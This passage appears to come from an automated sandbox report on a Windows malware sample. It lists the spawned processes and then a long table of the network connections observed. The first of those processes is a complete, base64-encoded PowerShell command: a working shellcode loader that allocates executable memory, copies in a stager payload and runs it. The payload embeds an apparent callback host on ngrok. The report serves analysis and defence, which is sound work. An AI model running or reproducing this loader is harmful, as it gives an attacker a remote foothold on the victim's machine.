ACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkAEoARwAgACQASABEACIAOwB9AA==
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -ec JABUAE8AIAA9ACAAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAGwAcgAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFQATwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJABWAFkAIAA9ACAAMAB4AGYAYwAsADAAeABlADgALAAwAHgAOABmACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAMAAsADAAeAAzADEALAAwAHgAZAAyACwAMAB4ADgAOQAsADAAeABlADUALAAwAHgANgA0ACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMwAwACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMABjACwAMAB4ADgAYgAsADAAeAA1ADIALAAwAHgAMQA0ACwAMAB4ADgAYgAsADAAeAA3ADIALAAwAHgAMgA4ACwAMAB4ADAAZgAsADAAeABiADcALAAwAHgANABhACwAMAB4ADIANgAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYQBjACwAMAB4ADMAYwAsADAAeAA2ADEALAAwAHgANwBjACwAMAB4ADAAMgAsADAAeAAyAGMALAAwAHgAMgAwACwAMAB4AGMAMQAsADAAeABjAGYALAAwAHgAMABkACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgANAA5ACwAMAB4ADcANQAsADAAeABlAGYALAAwAHgANQAyACwAMAB4ADUANwAsADAAeAA4AGIALAAwAHgANQAyACwAMAB4ADEAMAAsADAAeAA4AGIALAAwAHgANAAyACwAMAB4ADMAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADgAYgAsADAAeAA0ADAALAAwAHgANwA4ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4ADQAYwAsADAAeAAwADEALAAwAHgAZAAwACwAMAB4ADUAMAAsADAAeAA4AGIALAAwAHgANAA4ACwAMAB4ADEAOAAsADAAeAA4AGIALAAwAHgANQA4ACwAMAB4ADIAMAAsADAAeAAwADEALAAwAHgAZAAzACwAMAB4ADgANQAsADAAeABjADkALAAwAHgANwA0ACwAMAB4ADMAYwAsADAAeAAzADEALAAwAHgAZgBmACwAMAB4ADQAOQAsADAAeAA4AGIALAAwAHgAMwA0ACwAMAB4ADgAYgAsADAAeAAwADEALAAwAHgAZAA2ACwAMAB4ADMAMQAsADAAeABjADAALAAwAHgAYwAxACwAMAB4AGMAZgAsADAAeAAwAGQALAAwAHgAYQBjACwAMAB4ADAAMQAsADAAeABjADcALAAwAHgAMwA4ACwAMAB4AGUAMAAsADAAeAA3ADUALAAwAHgAZgA0ACwAMAB4ADAAMwAsADAAeAA3AGQALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeAA3AGQALAAwAHgAMgA0ACwAMAB4ADcANQAsADAAeABlADAALAAwAHgANQA4ACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMgA0ACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgANgA2ACwAMAB4ADgAYgAsADAAeAAwAGMALAAwAHgANABiACwAMAB4ADgAYgAsADAAeAA1ADgALAAwAHgAMQBjACwAMAB4ADAAMQAsADAAeABkADMALAAwAHgAOABiACwAMAB4ADAANAAsADAAeAA4AGIALAAwAHgAMAAxACwAMAB4AGQAMAAsADAAeAA4ADkALAAwAHgANAA0ACwAMAB4ADIANAAsADAAeAAyADQALAAwAHgANQBiACwAMAB4ADUAYgAsADAAeAA2ADEALAAwAHgANQA5ACwAMAB4ADUAYQAsADAAeAA1ADEALAAwAHgAZgBmACwAMAB4AGUAMAAsADAAeAA1ADgALAAwAHgANQBmACwAMAB4ADUAYQAsADAAeAA4AGIALAAwAHgAMQAyACwAMAB4AGUAOQAsADAAeAA4ADAALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgANQBkACwAMAB4ADYAOAAsADAAeAA2AGUALAAwAHgANgA1ACwAMAB4ADcANAAsADAAeAAwADAALAAwAHgANgA4ACwAMAB4ADcANwAsADAAeAA2ADkALAAwAHgANgBlACwAMAB4ADYAOQAsADAAeAA1ADQALAAwAHgANgA4ACwAMAB4ADQAYwAsADAAeAA3ADcALAAwAHgAMgA2ACwAMAB4ADAANwAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADMAMQAsADAAeABkAGIALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2ADgALAAwAHgAMwBhACwAMAB4ADUANgAsADAAeAA3ADkALAAwAHgAYQA3ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA2AGEALAAwAHgAMAAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANgA4ACwAMAB4ADgAZgAsADAAeAA0ADcALAAwAHgAMAAwACwAMAB4ADAAMAAsADAAeABlADgALAAwAHgAYgAwACwAMAB4ADAAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADIAZgAsADAAeAA2AGYALAAwAHgANgAzACwAMAB4ADYANAAsADAAeAA0ADMALAAwAHgANAA0ACwAMAB4ADYAOAAsADAAeAA1ADUALAAwAHgANABlACwAMAB4ADcAMgAsADAAeAA2AGYALAAwAHgAMwA4ACwAMAB4ADUAMgAsADAAeAA0ADgALAAwAHgANQAyACwAMAB4ADQAMQAsADAAeAA2ADMALAAwAHgANgA0ACwAMAB4ADMAMgAsADAAeAAzADEALAAwAHgANAA4ACwAMAB4ADMAMgAsADAAeAA0ADEALAAwAHgAMwAzACwAMAB4ADcAMgAsADAAeAA0AGMALAAwAHgANQA1ACwAMAB4ADYANQAsADAAeAA1ADEALAAwAHgANgBkACwAMAB4ADAAMAAsADAAeAA1ADAALAAwAHgANgA4ACwAMAB4ADUANwAsADAAeAA4ADkALAAwAHgAOQBmACwAMAB4AGMANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgAOQAsADAAeABjADYALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMwAyACwAMAB4AGUAOAAsADAAeAA4ADQALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQA3ACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4AGUAYgAsADAAeAA1ADUALAAwAHgAMgBlACwAMAB4ADMAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADkANgAsADAAeAA2AGEALAAwAHgAMABhACwAMAB4ADUAZgAsADAAeAA2ADgALAAwAHgAOAAwACwAMAB4ADMAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADgAOQAsADAAeABlADAALAAwAHgANgBhACwAMAB4ADAANAAsADAAeAA1ADAALAAwAHgANgBhACwAMAB4ADEAZgAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADcANQAsADAAeAA0ADYALAAwAHgAOQBlACwAMAB4ADgANgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADUAMwAsADAAeAA1ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADIAZAAsADAAeAAwADYALAAwAHgAMQA4ACwAMAB4ADcAYgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA1ACwAMAB4ADEANgAsADAAeAA2ADgALAAwAHgAOAA4ACwAMAB4ADEAMwAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAA0ADQALAAwAHgAZgAwACwAMAB4ADMANQAsADAAeABlADAALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA0AGYALAAwAHgANwA1ACwAMAB4AGMAZAAsADAAeAA2ADgALAAwAHgAZgAwACwAMAB4AGIANQAsADAAeABhADIALAAwAHgANQA2ACwAMAB4AGYAZgAsADAAeABkADUALAAwAHgANgBhACwAMAB4ADQAMAAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADEAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADYAOAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADQAMAAsADAAeAAwADAALAAwAHgANQAzACwAMAB4ADYAOAAsADAAeAA1ADgALAAwAHgAYQA0ACwAMAB4ADUAMwAsADAAeABlADUALAAwAHgAZgBmACwAMAB4AGQANQAsADAAeAA5ADMALAAwAHgANQAzACwAMAB4ADUAMwAsADAAeAA4ADkALAAwAHgAZQA3ACwAMAB4ADUANwAsADAAeAA2ADgALAAwAHgAMAAwACwAMAB4ADIAMAAsADAAeAAwADAALAAwAHgAMAAwACwAMAB4ADUAMwAsADAAeAA1ADYALAAwAHgANgA4ACwAMAB4ADEAMgAsADAAeAA5ADYALAAwAHgAOAA5ACwAMAB4AGUAMgAsADAAeABmAGYALAAwAHgAZAA1ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgANwA0ACwAMAB4AGMAZAAsADAAeAA4AGIALAAwAHgAMAA3ACwAMAB4ADAAMQAsADAAeABjADMALAAwAHgAOAA1ACwAMAB4AGMAMAAsADAAeAA3ADUALAAwAHgAZQA1ACwAMAB4ADUAOAAsADAAeABjADMALAAwAHgANQBmACwAMAB4AGUAOAAsADAAeAA2ADkALAAwAHgAZgBmACwAMAB4AGYAZgAsADAAeABmAGYALAAwAHgAMwAyACwAMAB4ADIAZQAsADAAeAA3ADQALAAwAHgANgAzACwAMAB4ADcAMAAsADAAeAAyAGUALAAwAHgANgA1ACwAMAB4ADcANQAsADAAeAAyAGUALAAwAHgANgBlACwAMAB4ADYANwAsADAAeAA3ADIALAAwAHgANgBmACwAMAB4ADYAYgAsADAAeAAyAGUALAAwAHgANgA5ACwAMAB4ADYAZgAsADAAeAAwADAAOwAkAGUAVwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJABWAFkALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZQBXACAAPQAgACQAVgBZAC4ATABlAG4AZwB0AGgAfQA7ACQAWgBoAD0AJABsAHIAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABlAFcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABsAHIAcAA9ADAAOwAkAGwAcgBwACAALQBsAGUAIAAoACQAVgBZAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGwAcgBwACsAKwApACAAewAkAGwAcgA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFoAaAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABsAHIAcAApACwAIAAkAFYAWQBbACQAbAByAHAAXQAsACAAMQApAH0AOwAkAGwAcgA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAWgBoACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwApAHsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAH0AOwA=
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s24hl05a\s24hl05a.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB7C.tmp" "c:\Users\Admin\AppData\Local\Temp\s24hl05a\CSC6A726B40C104461BB2177FA8445EAB.TMP"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | adfstat.yandex.ru | udp |
| RU | 87.250.250.145:443 | adfstat.yandex.ru | tcp |
| US | 8.8.8.8:53 | mc.yandex.ru | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| RU | 87.250.250.119:443 | mc.yandex.ru | tcp |
| US | 8.8.8.8:53 | mc.yandex.com | udp |
| US | 8.8.8.8:53 | 145.250.250.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.250.250.87.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 142.250.187.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 216.239.32.29:80 | pki.goog | tcp |
| US | 8.8.8.8:53 | 29.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 52.42.69.239:443 | shavar.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.69.42.52.in-addr.arpa | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| N/A | 127.0.0.1:49956 | tcp | |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| N/A | 127.0.0.1:49963 | tcp | |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:80 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:80 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| US | 8.8.8.8:53 | 5.145.216.31.in-addr.arpa | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 89.44.169.132:443 | mega.io | tcp |
| US | 8.8.8.8:53 | mega.io | udp |
| US | 8.8.8.8:53 | mega.io | udp |
| US | 8.8.8.8:53 | 132.169.44.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| LU | 66.203.125.11:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 11.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| LU | 89.44.169.132:443 | eu.static.mega.co.nz | tcp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| FR | 23.200.86.251:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.166:443 | r1---sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 251.86.200.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.183.194.173.in-addr.arpa | udp |
| GB | 173.194.183.166:443 | r1.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| US | 8.8.8.8:53 | 37.124.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| LU | 66.203.125.28:443 | reqstat.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | 5.144.216.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.125.203.66.in-addr.arpa | udp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 31.216.144.5:443 | mega.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| US | 8.8.8.8:53 | gfs440n202.userstorage.mega.co.nz | udp |
| JP | 103.99.35.202:443 | gfs440n202.userstorage.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 202.35.99.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| US | 8.8.8.8:53 | mcd270n310.karere.mega.nz | udp |
| LU | 66.203.125.56:443 | mcd270n310.karere.mega.nz | tcp |
| US | 8.8.8.8:53 | 56.125.203.66.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.nz | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| LU | 66.203.125.11:443 | lu.api.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | prod.balrog.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | lu.api.mega.co.nz | udp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
| US | 8.8.8.8:53 | 195.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 142.250.200.14:443 | apis.google.com | tcp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.46:443 | play.google.com | tcp |
| US | 8.8.8.8:53 | 46.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | mega.nz | udp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | mega.io | udp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| LU | 66.203.124.37:443 | mega.io | tcp |
| LU | 31.216.145.5:443 | mega.nz | tcp |
| US | 8.8.8.8:53 | g.api.mega.co.nz | udp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| US | 8.8.8.8:53 | 12.125.203.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | tcp |
| US | 8.8.8.8:53 | 10.178.250.142.in-addr.arpa | udp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | eu.static.mega.co.nz | udp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| LU | 66.203.124.37:443 | eu.static.mega.co.nz | tcp |
| GB | 142.250.178.10:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | reqstat.api.mega.co.nz | udp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.28:443 | reqstat.api.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| LU | 66.203.125.12:443 | g.api.mega.co.nz | tcp |
| N/A | 127.0.0.1:6341 | tcp | |
| N/A | 127.0.0.1:6341 | tcp | |
